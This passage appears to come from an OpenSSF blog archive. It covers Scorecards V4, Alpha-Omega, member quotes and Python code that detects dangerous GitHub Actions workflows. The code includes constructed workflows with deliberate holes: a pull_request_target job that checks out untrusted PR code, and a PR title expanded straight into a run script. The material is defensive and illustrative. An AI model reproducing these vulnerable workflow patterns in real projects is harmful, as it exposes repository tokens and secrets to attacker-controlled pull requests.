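# A checkout `ref:` that points at the pull request's own head commit or branch.
PR_HEAD_REF = re.compile(
    r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(?:sha|ref)\s*\}\}"
)


def run_script_lines(workflow_text):
    """Yield (line_number, shell_text) for each line inside a `run:` step."""
    block_indent = None
    for number, raw in enumerate(workflow_text.splitlines(), 1):
        if not raw.strip():
            continue
        indent = len(raw) - len(raw.lstrip())
        if block_indent is not None:
            if indent > block_indent:      # still inside a `run: |` block
                yield number, raw.strip()
                continue
            block_indent = None
        match = re.match(r"\s*(?:-\s+)?run:\s*(.*)$", raw)
        if match:
            value = match.group(1)
            if value[:1] in ("|", ">"):    # multi-line block scalar follows
                dash = 2 if raw.lstrip().startswith("-") else 0
                block_indent = indent + dash
            elif value:                    # single-line `run: command`
                yield number, value


def dangerous_workflow_findings(workflow_text):
    """Return sorted (line_number, kind, detail) findings for one workflow."""
    findings = []
    lines = workflow_text.splitlines()
    privileged_trigger = any(
        re.search(r"\bpull_request_target\b", line)
        for line in lines if not line.lstrip().startswith("#")
    )
    if privileged_trigger:
        # pull_request_target runs with the base repository's token and secrets,
        # so checking out the PR head brings untrusted code into that context.
        for number, line in enumerate(lines, 1):
            if PR_HEAD_REF.search(line):
                findings.append((number, "untrusted-checkout", line.strip()))
    for number, script in run_script_lines(workflow_text):
        # ${{ }} is expanded into the script text before the shell parses it.
        for match in UNTRUSTED_CONTEXT.finditer(script):
            findings.append((number, "script-injection", match.group(0)))
    return sorted(findings)


# Constructed workflow showing both risky patterns.
VULNERABLE_WORKFLOW = """\
name: greet-pr
on:
  pull_request_target:
    types: [opened]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Greet
        run: |
          echo "New PR: ${{ github.event.pull_request.title }}"
      - run: npm ci && npm test
"""

# Constructed corrected form: unprivileged trigger, read-only token, and the
# untrusted value passed through an environment variable instead of the script.
HARDENED_WORKFLOW = """\
name: greet-pr
on:
  pull_request:
    types: [opened]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Greet
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "New PR: $PR_TITLE"
      - run: npm ci && npm test
"""

if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW),
                        ("hardened", HARDENED_WORKFLOW)):
        print(label, dangerous_workflow_findings(text))
```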

Project Sigstore Sees Massive Contribution, Adoption to Sign, Verify and Protect OSS 

Sigstore recently released a project update that reported nearly 500 contributors, 3,000 commits, and over one million entries in Rekor. For more information on what is driving this adoption, please visit the Sigstore blog.

The “Great MFA Distribution” Distributes Codes to Claim Free Hardware Security Tokens to Almost 1000 Top OSS Developers

To encourage wider adoption of multi-factor authentication (MFA) by developers of critical open source projects, the Securing Critical Projects Working Group coordinated the distribution of nearly 1000 codes for free MFA tokens (graciously donated by Google and GitHub) to developers of the 100 most critical open source projects. This distribution is a small but critical step in avoiding supply chain attacks based on stolen credentials of key developers.

To join OpenSSF and/or contribute to these important initiatives, please visit: https://openssf.org/

Premier Member Quotes

1Password

“We’re proud to be among like-minded organizations and individuals that share a collective commitment to improving the security posture of open source software,” said Pedro Canahuati, Chief Technology Officer at 1Password. “Much of the technology we use today is built on open source software. Given 1Password’s human-centric approach to building user-friendly applications, it’s important to us that its integrity and security is protected.”

Citi

“The security of open source software and its supply chain is an essential aspect to Citi. We have worked with the open source community on bolstering security in these areas, and we look forward to strengthening this mission by joining the Open Source Security Foundation,” said Jonathan Meadows, Head of Cloud & Application Security Engineering, Citibank.

Coinbase

“Coinbase is the world’s most trusted cryptocurrency exchange, and the security of our open source dependencies — as well as the broader crypto ecosystem — is paramount. The OpenSSF’s goals align with our own, and Coinbase is proud to be contributing to increasing the security of open source software for the benefit of all,” said Jordan Harband, Staff Developer Relations Engineer, Coinbase.

Huawei Technologies

“The importance of open source software security is well recognized by the customer, industry, and government. It is time for the community to take strategic, continuous, effective, and efficient actions to advance the open source software security posture.  We are very glad to see OpenSSF launching initiatives (Scorecard, Alpha-Omega, SigStore, etc.) to improve the open source software security directly,” said Dr. Kai Chen, Chief Security Strategist, Huawei. “Huawei commits to strengthen investment on cybersecurity and to maintain a global, secure and resilient  open source software supply chain.”

JFrog

“Open source software is the foundation of today’s modern systems that run enterprises and government organizations alike – making software part of a nation’s critical infrastructure,” said Stephen Chin, VP of Developer Relations, JFrog. “JFrog is honored to be part of OpenSSF to accelerate innovation and advancement in supply chain security. Projects coming out of OpenSSF help make JFrog’s liquid software vision a secure reality.”

Wipro

“With the increasing adoption of open source software and its growing importance in enabling innovation and transformation comes commensurate cybersecurity risks. The community needs a concerted effort to address them. We are excited to join the governing board of OpenSSF to collaborate with other members on defining and building a set of solutions and frameworks and best practices to help ensure the integrity of the open source software supply chain and contribute our domain expertise, breadth of resources and global reach to this important effort,” said Subha Tatavarti, CTO, Wipro Limited.

General Member Quotes

Accuknox

“In the Shift Left, DevSecOps Developer-led adoption of Security Tools and platforms, an OpenSource-led approach is imperative. We are thrilled to see OpenSSF launching path-breaking initiatives to help end-users and technology providers harness the power of open source and contribute to the collective knowledge capital,” said Nat Natraj, co-founder, CEO, AccuKnox.

Alibaba Cloud

“Open Source software has become a key software supply chain of IT, and Open Source software security has a huge impact on infrastructure security. Alibaba Cloud, as the world’s leading cloud vendor that always puts security and data privacy as the priority, keeps investing in security research. For a long time, the public has felt that open source software is very safe because of transparency: all software developers can review the code, find and fix vulnerabilities. But in fact, it is still possible for much widely used open-source software to have security bugs that have not been noticed for a long time. It is great to have an organization like OpenSSF, which can connect so many great companies and open source communities to advance open source security for all. As a member of Open Source Security Foundation, we’re looking forward to collaborating with OpenSSF to strengthen the Open Source security,” said Xin Ouyang, Head of Alibaba Cloud Security, Alibaba Cloud.

Block, Inc.

“Block is very excited to join with other industry leaders to help step up the quality of open source security.  I strongly believe that as an industry, it is our priority to address security concerns in a supply chain that we all use.  We may compete on products, but we should never compete on security, and OSSF is a fantastic example of this idea,” said Jim Higgins, CISO of Block.

Blockchain Technology Partners

“Open source software is mainstream and underpins much of the world’s critical infrastructure as well as powering enterprises across the globe. Against this backdrop, OpenSSF’s mission to secure the open source supply chain is fundamental to our future,” said Duncan Johnston-Watt, CEO and Co-founder of Blockchain Technology Partners. “Collaboration is key to OpenSSF’s success, and so we are delighted to contribute to this initiative which complements our existing involvement in the Hyperledger Foundation, CNCF, and LF Energy.”

Catena Cyber

“Open source leads to a massive sharing of knowledge. Beyond the quantity of information, the quality of it becomes important to bring value to society,” said Philippe Antoine, CEO of Catenacyber. “We are glad to join OpenSSF to contribute to improving the cybersecurity of open source projects through fuzzing and other means. Let’s fix all the bugs!”

Chainguard

“Making the software lifecycle secure by default is increasingly critical as open source has become the digital backbone of the world. A vibrant, open software security ecosystem is essential to that mission. We are excited to be members of the Open Source Security Foundation and to continue working with the community to make the software lifecycle secure by default,” said Tracy Miranda, head of open source at Chainguard.

Cloudsmith

“Having a single source of truth for software artifacts has never been more vital to supply chains, especially for the open-source community. OSS engineers need trust and provenance, and a trusted source for secure end-to-end software delivery, from build through to production. At Cloudsmith, our mission is to evolve the cloud-native supply chain, making it simple for the OSS community to secure their software delivery at scale through Continuous Packaging. We are thrilled to join OpenSSF, and we look forward to being part of the continued mission to improve the security posture of open source software universally,” said Alan Carson, CEO at Cloudsmith.

DeployHub

“At DeployHub, we have been laser-focused on tracking the consumption of microservices, including their versions. These relationships make up our new application-level Software Bill of Materials (SBOMS). There is no better place to have this supply chain conversation than the OpenSSF,” explains Tracy Ragan, CEO DeployHub.

MongoDB

“As all industries increasingly rely upon open source software to deliver digital experiences, it is our collective responsibility to help maintain a vibrant and secure ecosystem,” said Lena Smart, Chief Information Security Officer, MongoDB. “You can have all the tools in the world, but at the end of the day, it is people across multiple organizations around the world working together that will ensure an expansive cybersecurity program. One of MongoDB’s values is “Build Together,” and we’re excited to join and further cross-industry collaboration to move the security of open source software forward.”

NCC Group

“Even if your code is perfectly secure, chances are it has vulnerable dependencies. And the number of unpatched vulnerabilities “in the wild” outpaces the speed at which the security community can patch or even identify them. Security, as it is practiced now, doesn’t scale at the rate needed to keep things at least as secure as they were yesterday, and we have compelling reasons to expect this to get even worse for defenders. However, through harnessing dedicated investment and coordinating industry-wide efforts to improve the security of the most critical open source components and find scalable interventions for the entire ecosystem, we have an opportunity to improve software security at a massive scale. But we can only do this together, and it is for this reason that NCC Group is excited to contribute to the work of OpenSSF,” said Jennifer Fernick, SVP & Global Head of Research at cybersecurity consulting firm NCC Group.

ReversingLabs

“The software supply chain has become a major risk vector for new threats, including those from the open source ecosystem. The inherent dependencies and complexities of the modern software supply chain means that companies often lack visibility and the ability to track each component through the entire software development process. Recognizing these challenges, ReversingLabs is pleased to join the OpenSSF and offer its contributions to the community that help drive the automation of more comprehensive software bills of material and mitigate software supply chain and package release risks,” said Mario Vuksan, CEO and Co-founder, ReversingLabs.

Spotify 

“As a technical community we all have a responsibility to improve the security and trust of an open source ecosystem that so many of us rely upon. Spotify has always relied on open source software, and contributes to the community through projects like Backstage. We believe open source software forms the backbone of our industry and we look forward to supporting the foundation’s goal of ensuring everyone can depend on a healthy and secure software ecosystem,” said Tyson Singer, VP, Head of Technology and Platforms at Spotify.

Teleport

“The complexity of modern infrastructure has broadened attack surface areas to the point where data breaches are just about an everyday occurrence,” said Ev Kontsevoy, CEO of Teleport. “These risks have been exacerbated by the rise of remote and hybrid workplaces. With an eye on global attacks, the open source community’s commitment to improving open source security is critical to ushering in a new era of computing. Offering a solution to increase security, ease usability, and help scale enterprise development access, Teleport is pleased to be a part of the OpenSSF.” 

Wingtecher Technology

“As a fast-growing startup, Wingtecher focuses on exploring the technologies that secure various kinds of open source software. We are excited to join OpenSSF and ready to collaborate with the community to overcome the emerging open source security challenges worldwide,” said Vincent Li, COO Wingtecher Technology.

###

The Linux Foundation has registered trademarks and uses trademarks. For a list of trademarks of The Linux Foundation, please see its trademark usage page: www.linuxfoundation.org/trademark-usage. Linux is a registered trademark of Linus Torvalds.

Media Contacts

Jennifer Cloer

503-867-2304

jennifer@storychangesculture.com

OpenSSF Webinar: Introduction to Project Alpha-Omega

We’ve scheduled a webinar on February 16, 2022 at 10:00 AM US/Pacific time for anyone who wants to learn more about Project Alpha-Omega, and registration is now open!

Hear from Brian Behlendorf (OpenSSF GM), David A. Wheeler (OpenSSF Director of Security), and Alpha-Omega project leaders Michael Scovetta (Microsoft) and Michael Winser (Google) to learn more about near term goals, milestones, and opportunities for participation in the Alpha-Omega Project.

OpenSSF Announces The Alpha-Omega Project to Improve Software Supply Chain Security for 10,000 OSS Projects

Following a meeting with government and industry leaders at the White House, OpenSSF is excited to announce the Alpha-Omega Project to improve the security posture of open source software (OSS) through direct engagement of software security experts and automated security testing. Microsoft and Google are supporting the Alpha-Omega Project with an initial investment of $5 million. This builds on previous industry-wide investments into OpenSSF aiming to improve open source software security.

Widely deployed OSS projects that are critical to global infrastructure and innovation have become top targets for adversarial attacks. Following new vulnerability disclosures, adversary attacks can be seen within hours. For example, recently discovered vulnerabilities in the widely deployed Log4j library forced many organizations into crisis as they raced to update applications using the popular library before adversaries could attack. 

The Alpha-Omega Project will improve global OSS supply chain security by working with project maintainers to systematically look for new, as-yet-undiscovered vulnerabilities in open source code, and get them fixed. “Alpha” will work with the maintainers of the most critical open source projects to help them identify and fix security vulnerabilities, and improve their security posture. “Omega” will identify at least 10,000 widely deployed OSS projects where it can apply automated security analysis, scoring, and remediation guidance to their open source maintainer communities.

“Open source software is a vital component of critical infrastructure for modern society. Therefore we must take every measure necessary to keep it and our software supply chains secure,” said Brian Behlendorf, General Manager, OpenSSF. “Alpha-Omega supports this effort in an open and transparent way by directly improving the security of open source projects through proactively finding, fixing, and preventing vulnerabilities.  This is the start of what we at OpenSSF hope will be a major channel for improving OSS security.”

Alpha: Focusing on the Most Critical OSS Projects

Alpha will be collaborative in nature, targeting and evaluating the most critical open source projects to help them improve their security postures. These projects will include standalone projects and core ecosystem services. They will be selected based on the work by the OpenSSF Securing Critical Projects working group using a combination of expert opinions and data, including the OpenSSF Criticality Score and Harvard’s “Census” analysis identifying critical open source software.

For these selected projects, Alpha team members will provide tailored help to understand and address security gaps. Help can include threat modeling, automated security testing, source code audits, and support remediating vulnerabilities that are discovered. It can also include implementing best practices drawn from criteria outlined by the OpenSSF Scorecard and Best Practices Badge projects.

Alpha will track a series of important metrics providing stakeholders with a better understanding of the security of the open source project they depend on. The public will receive a transparent, standardized view of the project’s security posture and compliance with security best practices. 

Omega: Focused on the Long Tail of OSS Projects

Omega will use automated methods and tools to identify critical security vulnerabilities across at least 10,000 widely-deployed open source projects. This will be accomplished using a combination of technology (cloud-scale analysis), people (security analysts triaging findings) and process (confidentially reporting critical vulnerabilities to the right OSS project stakeholders). Omega will have a dedicated team of software engineers continually tuning the analysis pipeline to reduce false positive rates and identify new vulnerabilities.

Omega community members will provide suggestions on how to automate detection of security vulnerabilities in the future and more generally on efficient ways to implement security best practices.

Corporate Partnerships Are Key

The value of securing the OSS ecosystem has become increasingly clear to companies and organizations of all sizes. Microsoft and Google’s support of the Alpha-Omega Project with an initial investment of $5 million and committed personnel is jump-starting the initiative. Other organizations are strongly encouraged to participate as well, whether by committing volunteers or by direct funding to expand the number of OSS projects that Alpha-Omega can reach.

“The long tail of important open source software, the ‘Omega’ of this endeavor, is always the hardest part—it will require not only considerable funding and perseverance, but its scale will also drive extensive automation for tracking and ideally fixing vulnerabilities,” stated Eric Brewer, VP of Infrastructure and Fellow at Google. “Enabling automation will be one of the greatest improvements for open source security.”

“At Microsoft, we proudly support OpenSSF and the Alpha-Omega Project. Open source software is a key part of our technology strategy, and it’s essential that we understand the security risk that accompanies all of our software dependencies,” offered Mark Russinovich, Chief Technology Officer, Microsoft Azure. “Alpha-Omega will provide assurance and transparency for key open source projects through direct engagement with maintainers and by using state-of-the-art security tools to detect and fix critical vulnerabilities. We look forward to collaborating with industry partners and the open source community on this important initiative.” 

Learn More and Get Involved

For more information about Alpha-Omega, see https://openssf.org/community/alpha-omega/. Individuals interested in updates about Alpha-Omega can sign up through an announcements mailing list. Organizations considering sponsorship or engagement in Alpha-Omega should email memberships@openssf.org.

The OpenSSF also encourages all individuals and organizations interested in Alpha-Omega to participate in its Securing Critical Projects working group.

Additional Resources

  • Join the OpenSSF to take an active role in improving OSS security
  • Participate in one of six OpenSSF working groups to help improve open source security
  • Get involved in our OpenSSF events, planning committees, and Slack workspaces
  • Download our new State of Software Bill of Materials and Cybersecurity Readiness report
  • Get certified as a secure software development professional

Reducing Security Risks in Open Source Software at Scale: Scorecards Launches V4

By Blog

Authors: Best Practices Working Group, Laurent Simon (Google), Azeem Shaikh (Google), and Jose Palafox (GitHub)

Today, two members of the Open Source Security Foundation, Google and GitHub, are partnering to release Scorecards V4, featuring a new GitHub Action, an added security check, and scaled up scans of the open source ecosystem.

The Scorecards project was launched last year as an automated security tool to help open source users understand the risks of the dependencies they consume. Though the world runs on open source software, many open source projects engage in at least one risky behavior—for example, not enabling branch protection, not pinning dependencies, or not enabling automatic dependency updates. Scorecards makes it simple to evaluate a package before consuming it: a scan run with a single line of code returns individual scores from 0 to 10 rating each individual security practice (“checks”) for the project and an aggregate score for the project’s overall security. Today’s release of a Scorecards GitHub Action makes it easier than ever for developers to stay on top of their security posture.

Helping Developers

Scorecards GitHub Workflow Action

Previously, Scorecards needed to be run manually to judge how changes to a project affected its security. The new Scorecards GitHub Action automates this process: once installed, the Action runs a Scorecards scan after any repository change. Maintainers can view security alerts in GitHub’s scanning dashboard and remediate any risky supply-chain practices introduced by the change. 

As shown in the example above, each alert includes the severity of the risk (low, medium, high, or critical), the file and line where the problem occurs (if applicable), and the remediation steps to fix the issue.

Several critical open source projects have already adopted the Scorecards Action, including Envoy, distroless, cosign, rekor, and kaniko. The Action is free to use and can be installed on any public repository by following these directions.

New Checks

We’re continually adding new security checks to help developers assess risks to their projects. This release adds the License check, which detects the presence of a project license, and the Dangerous-Workflow check, which detects dangerous usage of the pull_request_target trigger and risks of script injections in GitHub workflows. Dangerous-Workflow is the first Scorecards check with a “Critical” risk level rating, since these patterns are so easily exploited—with these workflows, a single pull request can introduce compromised code into a project. The new Scorecards check informs users of the existence of these vulnerabilities in their project and provides remediation guidance to fix the issue.
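The two patterns named above can be illustrated with a simplified line-based scan. This is an added example, not Scorecards' own implementation; the function name, the list of untrusted fields, the reading of "dangerous usage" as checking out the pull request head, and the sample workflow are all assumptions made for illustration.

```python
import re

# Expression fields a pull-request or issue author controls (partial list, assumed for this example).
UNTRUSTED = re.compile(
    r"\$\{\{[^}]*\bgithub\.(?:head_ref|event\.(?:pull_request\.(?:title|body|head\.ref)"
    r"|issue\.(?:title|body)|comment\.body))\b"
)
PR_HEAD = re.compile(r"^\s*ref:.*\bgithub\.event\.pull_request\.head\.(?:sha|ref)\b")
TRIGGER = re.compile(r"^[^#]*\bpull_request_target\b")


def scan_workflow(text):
    """Return (line_number, finding) pairs, in line order, for one workflow file."""
    lines = text.splitlines()
    privileged = any(TRIGGER.match(l) for l in lines)
    findings, run_col = [], None
    for no, line in enumerate(lines, 1):
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if run_col is not None and stripped and indent <= run_col:
            run_col = None                      # left the previous run: block
        m = re.match(r"^\s*(?:-\s+)?run:", line)
        if m:
            run_col = m.end() - len("run:")     # column where the run: key starts
        if run_col is not None and UNTRUSTED.search(line):
            findings.append((no, "script-injection"))
        if privileged and PR_HEAD.match(line):
            findings.append((no, "untrusted-checkout"))
    return findings

# Constructed sample: one risky checkout, one injectable step, one step using the env indirection.
SAMPLE = """\
on:
  pull_request_target:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Unsafe, title is pasted into the script text
        run: |
          echo "Title: ${{ github.event.pull_request.title }}"
      - name: Safer, title reaches the shell only as a variable
        env:
          TITLE: ${{ github.event.pull_request.title }}
        run: echo "Title: $TITLE"
"""
```

The last step is not flagged because the untrusted value is bound to an environment variable instead of being expanded into the script text before the shell runs.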

Scaling Up Data Availability

The Scorecards team runs weekly scans of a set of critical open source projects, creating snapshots of the security of the overall open source ecosystem at any given time. Over the past few months, we have increased the scale of scans from 50,000 projects to one million projects identified as most critical based on their number of direct dependencies, giving a more detailed view of the ecosystem and strengthening supply chain security as users see improved coverage of their dependencies. With Scorecards V4, the weekly scans now reflect the 0-10 rating scale for each repository rather than the pass-fail results of previous versions, adding more granularity to the data. The scan results are publicly available through the Scorecards API and on the OpenSSF metrics dashboard and Open Source Insights partner websites.

Growing the Community

Since our initial launch, we have been improving our codebase thanks to the expanding Scorecards community. In 2021, we grew to over 40 unique contributors, averaged over 16 commits per week (totalling 860 commits), and closed 270 issues. We warmly welcome new contributors; check out this list of good first-timer issues if you’d like to join in the fun. 

Here are a few examples of projects that have adopted Scorecards:

“kaniko is a popular open source container image builder for Kubernetes, so it’s very important to maintain the security of the repository and the codebase. The ossf/scorecard Github Action takes care of this for us and continuously monitors the repository. It took less than 5 minutes to install and quickly analyzed the repo and identified easy ways to make the project more secure.” 

– Priya Wadhwa, Kaniko

“We rely on scorecards in distroless to ensure we follow secure development best practices. Secure source and config means safer base images for all our users.”

 – Appu Goundan, Distroless

“Scorecards provides us the ability to rapidly litmus test new dependencies in the Envoy project. We have found this a valuable step in vetting new dependencies for well known attributes and we have integrated Scorecards into our dependency acceptance criteria. Machine checkable properties are an essential part of a sound security process.”

 – Harvey Tuch, Envoy

Strengthening the Supply Chain 

We expect 2022 to be a year of growing awareness of the criticality of supply chain security. If your New Year’s resolution is to pay closer attention to your projects’ security, using the Scorecards GitHub Action is one of the easiest ways to get started. Just install the workflow on your repositories and follow the remediation instructions to address the issues that roll in. Each incremental improvement helps strengthen the open source ecosystem for everyone.

For additional information, head over to the release notes and, as always, please reach out with any questions or suggestions.